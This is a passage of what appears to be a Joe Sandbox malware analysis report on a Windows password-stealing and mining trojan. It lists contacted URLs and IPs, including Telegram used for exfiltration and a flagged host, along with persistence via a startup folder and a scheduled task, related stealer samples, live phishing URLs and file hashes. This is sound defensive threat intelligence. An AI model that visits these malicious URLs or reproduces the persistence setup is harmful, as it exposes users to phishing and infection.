                                                                                                        https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000002.00000003.1443141988.00000142DB110000.00000004.00000800.00020000.00000000.sdmp, edb.log.2.drfalse
                                                                                                          		high
                                                                                                          https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srfsvchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://crl.ver)svchost.exe, 00000002.00000002.2466045168.00000142DB211000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		low
                                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdxsvchost.exe, 00000007.00000003.1717445453.0000023D06F69000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://passport.net/tbsvchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                http://upx.sf.netAmcache.hve.6.drfalse
                                                                                                                  		high
                                                                                                                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdssvchost.exe, 00000007.00000003.1717445453.0000023D06F69000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/Issuesvchost.exe, 00000007.00000003.1472186772.0000023D06F29000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfsvchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470127429.0000023D06F4D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://account.live.com/Wizard/Password/Change?id=80601svchost.exe, 00000007.00000003.1469891074.0000023D06F2C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470421983.0000023D06F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469979112.0000023D06F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1469891074.0000023D06F29000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470127429.0000023D06F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://g.live.com/odclientsettings/Prod1C:edb.log.2.drfalse
                                                                                                                            		high
                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/scsvchost.exe, 00000007.00000002.3900899316.0000023D06F37000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3900934606.0000023D06F5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470127429.0000023D06F4D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://account.live.com/inlinesignup.aspx?iww=1&id=80600svchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470127429.0000023D06F4D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuesvchost.exe, 00000007.00000003.1623217210.0000023D06F6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://login.microsoftonline.com/ppsecure/DeviceUpdate.srfsvchost.exe, 00000007.00000002.3897187473.0000023D06629000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470127429.0000023D06F4D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/Issuefsvchost.exe, 00000007.00000003.1717445453.0000023D06F69000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3900982101.0000023D06F6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://login.ecursvchost.exe, 00000007.00000002.3897337478.0000023D0663F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown
                                                                                                                                        https://account.live.com/inlinesignup.aspx?iww=1&id=80605svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://account.live.com/inlinesignup.aspx?iww=1&id=80603svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1470127429.0000023D06F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://account.live.com/inlinesignup.aspx?iww=1&id=80604svchost.exe, 00000007.00000003.1470215392.0000023D06F63000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3898772702.0000023D0665E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdsvchost.exe, 00000007.00000003.1623093821.0000023D06F78000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1717308062.0000023D06F84000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1622716421.0000023D07679000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1482586939.0000023D06F29000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high

                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                Public IPs

                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                149.154.167.220
                                                                                                                                                		api.telegram.orgUnited Kingdom
                                                                                                                                                		62041TELEGRAMRUfalse
                                                                                                                                                104.194.9.116
                                                                                                                                                		unknownUnited States
                                                                                                                                                		23470RELIABLESITEUStrue

                                                                                                                                                Private

                                                                                                                                                IP
                                                                                                                                                127.0.0.1

                                                                                                                                                General Information

                                                                                                                                                Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                Analysis ID:1416943
                                                                                                                                                Start date and time:2024-03-28 10:24:11 +01:00
                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                Overall analysis duration:0h 15m 17s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:full
                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                Number of analysed new started processes analysed:52
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
                                                                                                                                                • EGA enabled
                                                                                                                                                • AMSI enabled
                                                                                                                                                Analysis Mode:default
                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                Sample name:SecuriteInfo.com.Win64.PWSX-gen.25316.31097.exe
                                                                                                                                                Detection:MAL
                                                                                                                                                Classification:mal100.troj.adwa.spyw.expl.evad.mine.winEXE@96/54@2/3
                                                                                                                                                EGA Information:
                                                                                                                                                • Successful, ratio: 58.8%
                                                                                                                                                HCA Information:
                                                                                                                                                • Successful, ratio: 64%
                                                                                                                                                • Number of executed functions: 149
                                                                                                                                                • Number of non-executed functions: 206
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                Warnings

                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                                                                                • Excluded IPs from analysis (whitelisted): 20.190.151.68, 20.190.151.67, 20.190.151.6, 20.190.151.132, 20.190.151.69, 20.190.151.131, 20.190.151.133, 20.190.151.9, 72.21.81.240, 23.221.242.90, 13.85.23.86, 13.85.23.206, 69.164.0.128, 192.229.211.108, 20.189.173.22, 20.166.126.56, 52.165.165.26, 20.42.65.92, 20.42.73.29, 52.168.117.173
                                                                                                                                                • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, slscr.update.microsoft.com, onedsblobprdwus17.westus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, ocsp.edge.digicert.com, onedsblobprdeus15.eastus.cloudapp.azure.com, hlb.apr-52dd2-0.edgecastdns.net, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, www.tm.
                                                                                                                                                • Execution Graph export aborted for target MSBuild.exe, PID 3260 because it is empty
                                                                                                                                                • Execution Graph export aborted for target Microsoft.exe, PID 4536 because there are no executed function
                                                                                                                                                • Execution Graph export aborted for target hgzxhw.exe, PID 3660 because it is empty
                                                                                                                                                • Execution Graph export aborted for target msbuild.exe, PID 2432 because it is empty
                                                                                                                                                • Execution Graph export aborted for target msbuild.exe, PID 3960 because it is empty
                                                                                                                                                • Execution Graph export aborted for target spczxf.exe, PID 2908 because it is empty
                                                                                                                                                • Execution Graph export aborted for target utntwb.exe, PID 5788 because it is empty
                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                                Simulations

                                                                                                                                                Behavior and APIs

                                                                                                                                                TimeTypeDescription
                                                                                                                                                10:25:27API Interceptor265532x Sleep call for process: svchost.exe modified
                                                                                                                                                10:25:28API Interceptor3680017x Sleep call for process: jsc.exe modified
                                                                                                                                                10:25:48API Interceptor5x Sleep call for process: WerFault.exe modified
                                                                                                                                                10:25:53AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe
                                                                                                                                                10:26:46API Interceptor340992x Sleep call for process: aspnet_wp.exe modified
                                                                                                                                                10:26:55Task SchedulerRun new task: msbuild path: C:\Users\user\AppData\Local\ServiceHub\msbuild.exe
                                                                                                                                                10:27:01API Interceptor167691x Sleep call for process: wmplayer.exe modified
                                                                                                                                                10:27:03API Interceptor23x Sleep call for process: powershell.exe modified
                                                                                                                                                10:27:41API Interceptor84x Sleep call for process: WmiPrvSE.exe modified
                                                                                                                                                10:27:41API Interceptor334289x Sleep call for process: conhost.exe modified

                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                IPs

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                149.154.167.220SecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exeGet hashmaliciousDiscord Token Stealer, XenoRAT, XmrigBrowse
                                                                                                                                                  SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    x.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                                                                                                      aMObJ2eTUf.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLine, zgRATBrowse
                                                                                                                                                        iY40ylvr5y.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                          DHL9407155789...exeGet hashmaliciousDarkCloudBrowse
                                                                                                                                                            https://moodle-projects.wolfware.ncsu.edu/Shibboleth.sso/Logout?return=https://owa-storage-limitt.s3.us-east-2.amazonaws.com/owa-2024.html?uid=dGVzdEB0ZXN0LmNvbQoGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              lnvoice-1445766252.pdf.jsGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                                                                                                JUSTIF.TRANSF..exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                  0lujRkTbEG.jsGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                                                                                                    104.194.9.116file.exeGet hashmaliciousPureLog Stealer, RedLineBrowse

                                                                                                                                                                      Domains

                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                      fp2e7a.wpc.phicdn.nethttp://statisticsong.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 192.229.211.108
                                                                                                                                                                      8tUCycu3Wq.exeGet hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
                                                                                                                                                                      • 192.229.211.108
                                                                                                                                                                      https://usersync.tiqcdn.net/ping/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • 192.229.211.108
                                                                                                                                                                      https://login.service-mediobanca.com/?rid=5spGrj3Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • 192.229.211.108
                                                                                                                                                                      https://new-26766nbnberor44567789097jhjghgfvchg.s3.us-east-2.amazonaws.com/Win/index.html?tk=6mwXE1vq8p4KlPfsD2IC9FoU7MuHtzcBGet hashmaliciousTechSupportScamBrowse
                                                                                                                                                                      • 192.229.211.108
                                                                                                                                                                      https://www.applesassist.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • 192.229.211.108
                                                                                                                                                                      https://f6dfsdfsdfsdfsdfsdfs.z13.web.core.windows.net/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • 192.229.211.108
                                                                                                                                                                      https://0authdesktvalidatenowdiscover.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                      • 192.229.211.108
                                                                                                                                                                      https://www.areaclientiweb.eu/Get hashmaliciousPayPal PhisherBrowse
                                                                                                                                                                      • 192.229.211.108
                                                                                                                                                                      http://oldbillnewbillcallnow.s3-website-sa-east-1.amazonaws.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • 192.229.211.108
                                                                                                                                                                      api.telegram.orgSecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exeGet hashmaliciousDiscord Token Stealer, XenoRAT, XmrigBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      x.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      aMObJ2eTUf.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLine, zgRATBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      iY40ylvr5y.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      DHL9407155789...exeGet hashmaliciousDarkCloudBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      https://moodle-projects.wolfware.ncsu.edu/Shibboleth.sso/Logout?return=https://owa-storage-limitt.s3.us-east-2.amazonaws.com/owa-2024.html?uid=dGVzdEB0ZXN0LmNvbQoGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      lnvoice-1445766252.pdf.jsGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      JUSTIF.TRANSF..exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      0lujRkTbEG.jsGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                                                                                                      • 149.154.167.220

                                                                                                                                                                      ASNs

                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                      TELEGRAMRUSecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exeGet hashmaliciousDiscord Token Stealer, XenoRAT, XmrigBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      x.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      aMObJ2eTUf.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLine, zgRATBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      iY40ylvr5y.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      DHL9407155789...exeGet hashmaliciousDarkCloudBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      https://moodle-projects.wolfware.ncsu.edu/Shibboleth.sso/Logout?return=https://owa-storage-limitt.s3.us-east-2.amazonaws.com/owa-2024.html?uid=dGVzdEB0ZXN0LmNvbQoGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      lnvoice-1445766252.pdf.jsGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      JUSTIF.TRANSF..exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      0lujRkTbEG.jsGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      RELIABLESITEUSSecuriteInfo.com.Gen.Heur.Jatommy.03108.aaW@baaaa.28486.12528.exeGet hashmaliciousDiscord Token Stealer, XenoRAT, XmrigBrowse
                                                                                                                                                                      • 104.243.33.118
                                                                                                                                                                      SecuriteInfo.com.FileRepMalware.20494.7181.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                      • 104.243.33.118
                                                                                                                                                                      SecuriteInfo.com.Trojan.BtcMine.3725.7973.8724.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                      • 104.243.33.118
                                                                                                                                                                      TT-SWIFT-ERROR.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                      • 104.243.33.214
                                                                                                                                                                      nTDlOKAKOW.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 154.16.151.110
                                                                                                                                                                      uMqeVeoVI4.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                      • 154.16.151.102
                                                                                                                                                                      xktih0mnmY.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                      • 154.16.151.121
                                                                                                                                                                      scanned Draft Copy.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                                                                                                                      • 103.195.103.144
                                                                                                                                                                      PURCHASE_ORDER_SPECIFICATIONS.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                                                                                                                      • 103.195.103.144
                                                                                                                                                                      Order_specifications.xla.xlsxGet hashmaliciousRemcosBrowse
                                                                                                                                                                      • 45.126.208.191

                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                      1138de370e523e824bbca92d049a3777http://www.cpearson.com/Zips/FindAll.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 104.98.116.138
                                                                                                                                                                      https://new-26766nbnberor44567789097jhjghgfvchg.s3.us-east-2.amazonaws.com/Win/index.html?tk=6mwXE1vq8p4KlPfsD2IC9FoU7MuHtzcBGet hashmaliciousTechSupportScamBrowse
                                                                                                                                                                      • 104.98.116.138
                                                                                                                                                                      https://www.applesassist.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • 104.98.116.138
                                                                                                                                                                      https://mail.profil.aktualisieren.87-121-52-217.cprapid.com/Get hashmaliciousPayPal PhisherBrowse
                                                                                                                                                                      • 104.98.116.138
                                                                                                                                                                      https://attmailingselserviceupdate-4326763.ubpages.com/9448ff0e-ec5b-11ee-b33f/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • 104.98.116.138
                                                                                                                                                                      https://oo5-secondary.z31.web.core.windows.net/werrx01USAHTML/?bcda=(0101)-87764-30715Get hashmaliciousTechSupportScamBrowse
                                                                                                                                                                      • 104.98.116.138
                                                                                                                                                                      https://accedi.91-92-243-23.cprapid.com/ING/Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • 104.98.116.138
                                                                                                                                                                      https://wigro-my.sharepoint.com/:b:/g/personal/wgrosz_wigrollc_com/EaDE-zx64QdFhFZzHN47-ncBF44bpJSf-g-cC6fI14U1dQ?e=l9dufwGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                      • 104.98.116.138
                                                                                                                                                                      https://na4.docusign.net/Signing/EmailStart.aspx?a=2cb6bd57-08da-41fa-ba3e-335e4ec78d11&acct=4b9f472d-1c67-4f33-8c1e-bbe8b9668a32&er=1641611c-7ddf-44d0-b848-c94a5513531bGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                      • 104.98.116.138
                                                                                                                                                                      https://in.xero.com/vBwCZAhFqYGjg61HNYslbFuhU3YdoremUEl8v3w6?utm_source=invoiceEmailViewInvoiceButtonGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 104.98.116.138
                                                                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0e11111.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      SecuriteInfo.com.Win64.CrypterX-gen.24907.17990.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      f699.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      x.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      Move Mouse.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      SecuriteInfo.com.Win32.PWSX-gen.23268.16982.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      aMObJ2eTUf.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLine, zgRATBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      RFQ20240327_Lista comercial_pdf.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      Richiesta di preventivo_RFQ03272024_pdf.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      invoicee.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      37f463bf4616ecd445d4a1937da06e19i1crvbOZAP.exeGet hashmaliciousAmadey, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      yU3icg18lq.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      RFQ20240327_Lista comercial_pdf.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      Richiesta di preventivo_RFQ03272024_pdf.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      invoicee.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      RFQ20240327_Lista commerciale.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      TOMBIG - 9004898 - Ponuka#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      salaryinfo24.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      IMCA Nowe zam#U00f3wienie.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                      • 149.154.167.220
                                                                                                                                                                      Wage_Plan_pdf.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                      • 149.154.167.220

                                                                                                                                                                      Dropped Files

                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                      C:\Users\user\AppData\Local\ServiceHub\msbuild.exefile.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                                                                                                                        file.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                          KFpBzffEaM.exeGet hashmaliciousNanocore, PureLog Stealer, zgRATBrowse
                                                                                                                                                                            LMcGYzntaD.exeGet hashmaliciousNanocore, PureLog Stealer, zgRATBrowse
                                                                                                                                                                              Order 72005918536.bat.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                Pitsn.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                  ujWn3eOza6.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                    PANELLI_s.r.l._.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                      CDGT003983765367VND--30983RDGHJ.exeGet hashmaliciousGuLoader, XWormBrowse
                                                                                                                                                                                        7nwLP8vlHl.exeGet hashmaliciousPureLog StealerBrowse

                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\edb.chk

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):8192
                                                                                                                                                                                          Entropy (8bit):0.35901589905449205
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6:6xboaaD0JOCEfMuaaD0JOCEfMKQmDkxboaaD0JOCEfMuaaD0JOCEfMKQmD:ZaaD0JcaaD0JwQQnaaD0JcaaD0JwQQ
                                                                                                                                                                                          MD5:7D48941DB05D2D1C9A0C52739933543F
                                                                                                                                                                                          SHA1:4FF1446A7D5DA6BBEA145000B00A9F4FFED90930
                                                                                                                                                                                          SHA-256:C436AB7F36E238365FDDF5BDFEB9EBFEFACE94AD0FEB79C571182DA968815D87
                                                                                                                                                                                          SHA-512:41C7DA95797437840014733F7021883E034503A9D8F07F7C9A0B1131A869A29A6E00D4E9FA99EEDAFBDD2F0DFDAFFB0A7671D8F666DA0E2023CA887E4BA0FB62
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:*.>...........f.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................f.............................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          File Type:data
